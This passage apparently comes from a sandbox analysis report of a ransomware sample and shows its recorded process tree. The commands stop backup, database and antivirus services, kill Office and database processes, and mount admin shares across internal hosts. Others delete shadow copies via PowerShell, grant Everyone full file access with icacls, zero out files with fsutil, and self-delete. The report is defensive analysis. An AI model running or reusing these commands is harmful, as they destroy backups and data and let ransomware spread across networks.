C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecJobEngine /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop MSSQL$PROD /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$PROD /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop AcronisAgent /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop AcronisAgent /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop BackupExecManagementService /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecManagementService /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop MSSQL$PROFXENGAGEMENT /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$PROFXENGAGEMENT /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop Antivirus /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop Antivirus /y3⤵
-
C:\Windows\system32\net.exe"net.exe" stop BackupExecRPCService /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecRPCService /y3⤵
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM mspub.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\net.exe"net.exe" use \\127.0.0.3\V$2⤵
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM mydesktopqos.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM mydesktopservice.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM mysqld.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM sqbcoreservice.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM firefoxconfig.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\net.exe"net.exe" use \\127.0.0.3\W$2⤵
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM agntsvc.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM thebat.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM steam.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM encsvc.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM excel.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\net.exe"net.exe" use \\127.0.0.3\X$2⤵
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM CNTAoSMgr.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM sqlwriter.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM tbirdconfig.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM dbeng50.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\net.exe"net.exe" use \\127.0.0.3\Y$2⤵
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM thebat64.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\net.exe"net.exe" use \\10.7.0.18\Users2⤵
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM ocomm.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM infopath.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM mbamtray.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\net.exe"net.exe" use \\127.0.0.3\Z$2⤵
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM mspub.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM zoolz.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\net.exe"net.exe" use \\10.7.0.18\A$2⤵
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM Ntrtscan.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\taskkill.exe"taskkill.exe" IM thunderbird.exe /F2⤵
- Kills process with taskkill
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM dbsnmp.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\net.exe"net.exe" use \\10.7.0.22\Users2⤵
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM isqlplussvc.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\net.exe"net.exe" use \\10.7.0.22\B$2⤵
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM xfssvccon.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM onenote.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM tmlisten.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM PccNTMon.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\net.exe"net.exe" use \\10.7.0.22\A$2⤵
-
C:\Windows\system32\net.exe"net.exe" use \\10.7.0.22\C$2⤵
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM msftesql.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM msaccess.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM powerpnt.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM outlook.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM mydesktopqos.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM synctime.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\net.exe"net.exe" use \\10.7.0.22\B$2⤵
-
C:\Windows\system32\net.exe"net.exe" use \\10.7.0.22\N$2⤵
-
C:\Windows\system32\net.exe"net.exe" use \\10.7.0.22\D$2⤵
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM visio.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM mydesktopservice.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM winword.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM mysqld-nt.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\net.exe"net.exe" use \\10.7.0.22\C$2⤵
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM wordpad.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\net.exe"net.exe" use \\10.7.0.22\O$2⤵
-
C:\Windows\system32\net.exe"net.exe" use \\10.7.0.22\E$2⤵
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM mysqld-opt.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM ocautoupds.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM ocssd.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\net.exe"net.exe" use \\10.7.0.22\D$2⤵
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM oracle.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\net.exe"net.exe" use \\10.7.0.22\P$2⤵
-
C:\Windows\system32\net.exe"net.exe" use \\10.7.0.22\F$2⤵
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM sqlagent.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM sqlbrowser.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM sqlservr.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" & Get-WmiObject Win32_Shadowcopy | ForEach-Object { $_Delete(); }2⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\net.exe"net.exe" use \\10.7.0.22\E$2⤵
-
C:\Windows\system32\icacls.exe"icacls" "C:*" /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
-
C:\Windows\system32\net.exe"net.exe" use \\10.7.0.22\Q$2⤵
-
C:\Windows\system32\net.exe"net.exe" use \\10.7.0.22\G$2⤵
-
C:\Windows\system32\net.exe"net.exe" use \\10.7.0.22\F$2⤵
-
C:\Windows\system32\net.exe"net.exe" use \\10.7.0.22\R$2⤵
-
C:\Windows\system32\net.exe"net.exe" use \\10.7.0.22\H$2⤵
-
C:\Windows\system32\icacls.exe"icacls" "D:*" /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
-
C:\Windows\system32\icacls.exe"icacls" "Z:*" /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
-
C:\Windows\system32\net.exe"net.exe" use \\10.7.0.22\G$2⤵
-
C:\Windows\system32\net.exe"net.exe" use \\10.7.0.22\I$2⤵
-
C:\Windows\system32\net.exe"net.exe" use \\10.7.0.22\S$2⤵
-
C:\Windows\system32\net.exe"net.exe" use \\10.7.0.22\H$2⤵
-
C:\Windows\system32\net.exe"net.exe" use \\10.7.0.22\T$2⤵
-
C:\Windows\system32\net.exe"net.exe" use \\10.7.0.22\J$2⤵
-
C:\Windows\system32\net.exe"net.exe" use \\10.7.0.22\I$2⤵
-
C:\Windows\system32\net.exe"net.exe" use \\10.7.0.22\K$2⤵
-
C:\Windows\system32\net.exe"net.exe" use \\10.7.0.22\U$2⤵
-
C:\Windows\system32\net.exe"net.exe" use \\10.7.0.22\L$2⤵
-
C:\Windows\system32\net.exe"net.exe" use \\10.7.0.22\J$2⤵
-
C:\Windows\system32\net.exe"net.exe" use \\10.7.0.22\V$2⤵
-
C:\Windows\system32\net.exe"net.exe" use \\10.7.0.22\K$2⤵
-
C:\Windows\system32\net.exe"net.exe" use \\10.7.0.22\W$2⤵
-
C:\Windows\system32\net.exe"net.exe" use \\10.7.0.22\M$2⤵
-
C:\Windows\system32\net.exe"net.exe" use \\10.7.0.22\L$2⤵
-
C:\Windows\system32\net.exe"net.exe" use \\10.7.0.22\N$2⤵
-
C:\Windows\system32\net.exe"net.exe" use \\10.7.0.22\X$2⤵
-
C:\Windows\system32\net.exe"net.exe" use \\10.7.0.22\M$2⤵
-
C:\Windows\system32\net.exe"net.exe" use \\10.7.0.22\Y$2⤵
-
C:\Windows\system32\net.exe"net.exe" use \\10.7.0.22\O$2⤵
-
C:\Windows\system32\net.exe"net.exe" use \\10.7.0.22\Z$2⤵
-
C:\Windows\system32\net.exe"net.exe" use \\10.7.0.22\P$2⤵
-
C:\Windows\system32\net.exe"net.exe" use \\10.7.0.22\Q$2⤵
-
C:\Windows\system32\net.exe"net.exe" use \\10.7.0.22\R$2⤵
-
C:\Windows\system32\net.exe"net.exe" use \\10.7.0.22\S$2⤵
-
C:\Windows\system32\net.exe"net.exe" use \\10.7.0.39\Users2⤵
-
C:\Windows\system32\net.exe"net.exe" use \\10.7.0.39\T$2⤵
-
C:\Windows\system32\net.exe"net.exe" use \\10.7.0.39\U$2⤵
-
C:\Windows\system32\net.exe"net.exe" use \\10.7.0.39\A$2⤵
-
C:\Windows\system32\net.exe"net.exe" use \\10.7.0.26\Users2⤵
-
C:\Windows\system32\net.exe"net.exe" use \\10.7.0.26\B$2⤵
-
C:\Windows\system32\net.exe"net.exe" use \\10.7.0.26\V$2⤵
-
C:\Windows\system32\net.exe"net.exe" use \\10.7.0.26\A$2⤵
-
C:\Windows\system32\net.exe"net.exe" use \\10.7.0.26\C$2⤵
-
C:\Windows\system32\net.exe"net.exe" use \\10.7.0.26\W$2⤵
-
C:\Windows\system32\net.exe"net.exe" use \\10.7.0.26\B$2⤵
-
C:\Windows\system32\net.exe"net.exe" use \\10.7.0.26\N$2⤵
-
C:\Windows\system32\net.exe"net.exe" use \\10.7.0.26\D$2⤵
-
C:\Windows\system32\net.exe"net.exe" use \\10.7.0.26\X$2⤵
-
C:\Windows\system32\net.exe"net.exe" use \\10.7.0.26\C$2⤵
-
C:\Windows\system32\net.exe"net.exe" use \\10.7.0.26\O$2⤵
-
C:\Windows\system32\net.exe"net.exe" use \\10.7.0.26\E$2⤵
-
C:\Windows\system32\net.exe"net.exe" use \\10.7.0.26\Y$2⤵
-
C:\Windows\system32\net.exe"net.exe" use \\10.7.0.26\D$2⤵
-
C:\Windows\system32\net.exe"net.exe" use \\10.7.0.26\P$2⤵
-
C:\Windows\system32\net.exe"net.exe" use \\10.7.0.26\F$2⤵
-
C:\Windows\system32\net.exe"net.exe" use \\10.7.0.26\Z$2⤵
-
C:\Windows\system32\net.exe"net.exe" use \\10.7.0.26\E$2⤵
-
C:\Windows\system32\net.exe"net.exe" use \\10.7.0.26\Q$2⤵
-
C:\Windows\system32\net.exe"net.exe" use \\10.7.0.26\G$2⤵
-
C:\Windows\System32\notepad.exe"C:\Windows\System32\notepad.exe" C:\Users\Admin\Desktop\RESTORE_FILES_INFO.txt2⤵
- Opens file in notepad (likely ransom note)
-
C:\Windows\system32\net.exe"net.exe" use \\10.7.0.26\F$2⤵
-
C:\Windows\system32\cmd.exe"cmd.exe" /C ping 127.0.0.7 -n 3 > Nul & fsutil file setZeroData offset=0 length=524288 “%s” & Del /f /q “%s”2⤵
-
C:\Windows\system32\PING.EXEping 127.0.0.7 -n 33⤵
- Runs ping.exe
-
C:\Windows\system32\fsutil.exefsutil file setZeroData offset=0 length=524288 “%s”3⤵
-
C:\Windows\system32\net.exe"net.exe" use \\10.7.0.26\R$2⤵
-
C:\Windows\system32\net.exe"net.exe" use \\10.7.0.26\H$2⤵
-
C:\Windows\system32\net.exe"net.exe" use \\10.7.0.26\G$2⤵
-
C:\Windows\system32\net.exe"net.exe" use \\10.7.0.26\S$2⤵
-
C:\Windows\system32\net.exe"net.exe" use \\10.7.0.26\I$2⤵
-
C:\Windows\system32\net.exe"net.exe" use \\10.7.0.26\H$2⤵
-
C:\Windows\system32\net.exe"net.exe" use \\10.7.0.26\T$2⤵
-
C:\Windows\system32\net.exe"net.exe" use \\10.7.0.26\J$2⤵
-
C:\Windows\system32\net.exe"net.exe" use \\10.7.0.26\I$2⤵
-
C:\Windows\system32\net.exe"net.exe" use \\10.7.0.41\Users2⤵
-
C:\Windows\system32\net.exe"net.exe" use \\10.7.0.41\U$2⤵
-
C:\Windows\system32\net.exe"net.exe" use \\10.7.0.41\K$2⤵
-
C:\Windows\system32\net.exe"net.exe" use \\10.7.0.41\J$2⤵
-
C:\Windows\system32\net.exe"net.exe" use \\10.7.0.41\A$2⤵
-
C:\Windows\system32\net.exe"net.exe" use \\10.7.0.41\V$2⤵
-
C:\Windows\system32\net.exe"net.exe" use \\10.7.0.41\L$2⤵
-
C:\Windows\system32\net.exe"net.exe" use \\10.7.0.41\K$2⤵
-
C:\Windows\system32\net.exe"net.exe" use \\10.7.0.41\B$2⤵
-
C:\Windows\system32\net.exe"net.exe" use \\10.7.0.41\W$2⤵
-
C:\Windows\system32\net.exe"net.exe" use \\10.7.0.41\M$2⤵
-
C:\Windows\system32\net.exe"net.exe" use \\10.7.0.41\C$2⤵
-
C:\Windows\system32\net.exe"net.exe" use \\10.7.0.41\L$2⤵
-
C:\Windows\system32\net.exe"net.exe" use \\10.7.0.41\X$2⤵
-
C:\Windows\system32\net.exe"net.exe" use \\10.7.0.41\N$2⤵
-
C:\Windows\system32\net.exe"net.exe" use \\10.7.0.41\M$2⤵
-
C:\Windows\system32\net.exe"net.exe" use \\10.7.0.41\D$2⤵
-
C:\Windows\system32\net.exe"net.exe" use \\10.7.0.41\Y$2⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" "/C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\net_shares.exe2⤵
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 33⤵
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "459276405-12352579554562502631383936751061481147-16520052601344819490-2130542768"1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MySQL80 /y1⤵
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-120099792-513262164624591657-204245377-7818781187190039371070151927-1753986287"1⤵
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-1744232508-1972171431-52788536-2127998054-1276176347-1926890039892092741779201367"1⤵
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-1907012716-707226390-462613461320036614-211964745568847761-7119984561014601085"1⤵
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-1697813804-6035931787301774791667032705-11438326291941286542-1463344357-866678617"1⤵
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "651269684-887498605-1440053385-2144540442316155710-31482282496613938224624401"1⤵
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "353273067-8318396192767342791509529171-47831708279639171-158133386-1126549728"1⤵
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-1013758202-423897856-1777289505800241960941658443-1686942032-248649390742661625"1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop “intel(r) proset monitoring service” /y2⤵
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "15256947041308227811-15000696707852471341872335352-3714618181444045519-981905962"1⤵
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-621552037-93560695514237297821873062563-274471760-742914861-1667150099-1932707708"1⤵
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-2910859702074495441-31170180917552343752004791913-17275709492132213999-646718565"1⤵
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-19651990981184125260810213246239162291-16116986881664631382-122003297-120429108"1⤵
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "1328326669-1341543089390731478-1551658987-315165929-50997467-344572684-202768171"1⤵
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "583945399325559316-120450974-1718322434224687444-1286139484531461741688976153"1⤵
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "1508905637-16954489-547760545-1075295790-73861833-2721909381573000663-1989129635"1⤵
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "2061087588-600324891949525264-1556219298-530720350-1606738581-1606279418936677290"1⤵
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "290576391055360772-1559807822-1590535388-19021690111513524208-912811248-1363952790"1⤵
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-956706944-1729099731-20351188711873921911-123203661914648947801950625939-1869805188"1⤵
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-70275511110755978702522130411843090422-1430290908-315668869-742901283-2060758086"1⤵
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-787331411412877519-945263473395261760909367197-109956626316177308742143171242"1⤵
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-1828263619-492088037-381620428-436604621-706286660-1021891764-1592591502-535517874"1⤵
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "2081307357933939619-1311218254896481968-1158175720-896681637-398275894-1408440914"1⤵
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-2040984338969866485-172885877385319370-1682920815127087396447312792-395228887"1⤵
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-13177426421916375672-9169405431960000255-14009969222095743106-831342693578804813"1⤵
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "1469308286-2811857731576727348146393967274949095917247011941584311152-15828368"1⤵
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-783899435-19042877249771940551220583737-1560149408135911512-464336690-356039589"1⤵
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-206033335588805899528929938614957439169475679107205925-928646810863319143"1⤵
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "5235107893357909772961027621900886480-472213381-195050286721413470521521795114"1⤵
-
C:\Windows\explorer.exe"C:\Windows\explorer.exe"1⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
\??\PIPE\wkssvcMD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
\??\PIPE\wkssvcMD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
\??\PIPE\wkssvcMD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
\??\PIPE\wkssvcMD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
\??\PIPE\wkssvcMD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
\??\PIPE\wkssvcMD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
\??\PIPE\wkssvcMD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
\??\PIPE\wkssvcMD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
\??\PIPE\wkssvcMD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
\??\PIPE\wkssvcMD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
\??\PIPE\wkssvcMD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
\??\PIPE\wkssvcMD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
\??\PIPE\wkssvcMD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
\??\PIPE\wkssvcMD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
\??\PIPE\wkssvcMD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
\??\PIPE\wkssvcMD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
\??\PIPE\wkssvcMD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
\??\PIPE\wkssvcMD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
